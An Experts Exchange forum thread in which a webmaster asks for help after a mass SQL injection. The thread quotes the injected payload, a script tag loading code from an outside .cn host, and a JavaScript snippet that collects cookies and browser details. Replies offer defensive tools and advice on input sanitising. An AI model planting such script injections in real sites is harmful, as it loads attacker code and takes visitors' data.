Solved

sql injection attack

Posted on 2008-10-09
3
409 Views
Last Modified: 2012-05-05
I got hit last night with a sql injection that loaded a script into a lot of my fields in mulitple tables.
1I wanted to find out if anyone knows what this script did and how i can get rid of it,
2) and if there are any good sql injection tools that i  can use to find the vulnerable areas.
3)The attack added this to the end of a bunch of fields in my database.  How do i go about doing a replace for all fields in a table or the entire database so that it won't take forever to remove them.

here is the script that was added.


really need help on this
thanks in advance
danny
<script src=http://mokanfu.cn></script>
and here is what the function on the site looks like
 
function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} function y_g(name) {var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(iyesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}} var yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent); document.write(''); var seraph; if (seraph==null) { seraph=1; document.write(""); }

Open in new window

0
Comment
Question by:norway77
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
3 Comments
 
LVL 10

Accepted Solution

by:
TAB8 earned 500 total points
ID: 22683204
Hi Norway77 here is a handy link for people that have been slammed with SQL Injection attacks

Microsoft has released an advisory for the recent SQL Injection attacks which points to several tools that will help identify and block these type of attacks.

http://blogs.msdn.com/joestagner/archive/2008/06/24/tools-to-block-and-eradicate-sql-injection.aspx 
0
 

Author Closing Comment

by:norway77
ID: 31504739
thanks for your help
0
 
LVL 23

Expert Comment

by:Tony McCreath
ID: 22688046
Just realised its closed after I wrote an answer. Might as well add my 2c...

I don't think this is sql injection but form injection.

Were the field in the database related to fields you populate when visitors fill in web forms?

If this is the case here are a few suggestions for protection:
  • Before letting visitors submit, verify its a real person via logon, captcha, question or other sorts of system that block bots and spammers.
  • Don't allow tags in the data. Develop a function to strip undesirable content.
If you want to help protect form sql injection, make sure you escape or remove quotes from any data you include in sql statements.
0

Featured Post

Resolve Critical IT Incidents Fast

If your data, services or processes become compromised, your organization can suffer damage in just minutes and how fast you communicate during a major IT incident is everything. Learn how to immediately identify incidents & best practices to resolve them quickly and effectively.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

I'm trying, I really am. But I've seen so many wrong approaches involving date(time) boundaries I despair about my inability to explain it. I've seen quite a few recently that define a non-leap year as 364 days, or 366 days and the list goes on. …
This article explains how to reset the password of the sa account on a Microsoft SQL Server.  The steps in this article work in SQL 2005, 2008, 2008 R2, 2012, 2014 and 2016.
Using examples as well as descriptions, and references to Books Online, show the documentation available for date manipulation functions and by using a select few of these functions, show how date based data can be manipulated with these functions.
Viewers will learn how the fundamental information of how to create a table.

707 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question